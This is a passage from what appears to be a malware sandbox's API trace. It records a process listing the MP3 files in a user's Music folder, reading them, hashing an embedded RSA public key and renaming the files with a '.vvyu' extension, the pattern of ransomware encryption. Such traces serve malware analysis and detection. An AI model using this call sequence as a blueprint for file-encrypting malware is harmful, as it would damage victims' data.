hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.355] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.355] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.355] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.356] CloseHandle (hObject=0x584) returned 1 [0195.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0195.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0195.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0195.369] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\mOm18edC.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\eb_b9k_jdavxhxh0\\mom18edc.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\mOm18edC.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\eb_b9k_jdavxhxh0\\mom18edc.mp3.vvyu")) returned 1 [0195.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.371] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.373] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbef3680, ftCreationTime.dwHighDateTime=0x1d8a637, ftLastAccessTime.dwLowDateTime=0x61898110, ftLastAccessTime.dwHighDateTime=0x1d8a6c1, ftLastWriteTime.dwLowDateTime=0x61898110, ftLastWriteTime.dwHighDateTime=0x1d8a6c1, nFileSizeHigh=0x0, nFileSizeLow=0x6c13, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sTzvqONg_kzYduboTTT.mp3", cAlternateFileName="STZVQO~1.MP3")) returned 1 [0195.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0195.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.374] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\sTzvqONg_kzYduboTTT.mp3") returned=".mp3" [0195.374] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\sTzvqONg_kzYduboTTT.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\eb_b9k_jdavxhxh0\\stzvqong_kzydubottt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.386] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=27667) returned 1 [0195.386] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.389] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6bed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.389] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.391] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.391] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x6c13, lpOverlapped=0x0) returned 1 [0195.392] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.392] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.392] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.392] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.394] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.394] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.394] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.394] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.394] GetLastError () returned 0x0 [0195.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.394] GetLastError () returned 0x0 [0195.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.395] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.395] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.395] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.395] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.395] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6c10) returned 0x2af5168 [0195.396] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0195.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2218 [0195.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63f8 [0195.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1eb8 [0195.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6410 [0195.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6440 [0195.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64a0 [0195.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6458 [0195.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.397] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0195.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64a0 [0195.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0195.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6458 [0195.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6440 [0195.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0195.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0195.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.401] GetCurrentThreadId () returned 0x5d8 [0195.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae82f8 [0195.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0195.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.401] GetCurrentThreadId () returned 0x5d8 [0195.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64a0 [0195.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6440 [0195.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0195.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6458 [0195.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6428 [0195.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64b8 [0195.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0195.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6488 [0195.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6470 [0195.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64d0 [0195.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6470 [0195.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0195.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0195.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6440 [0195.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0195.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0195.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0195.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0195.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0195.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0195.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1eb8 | out: 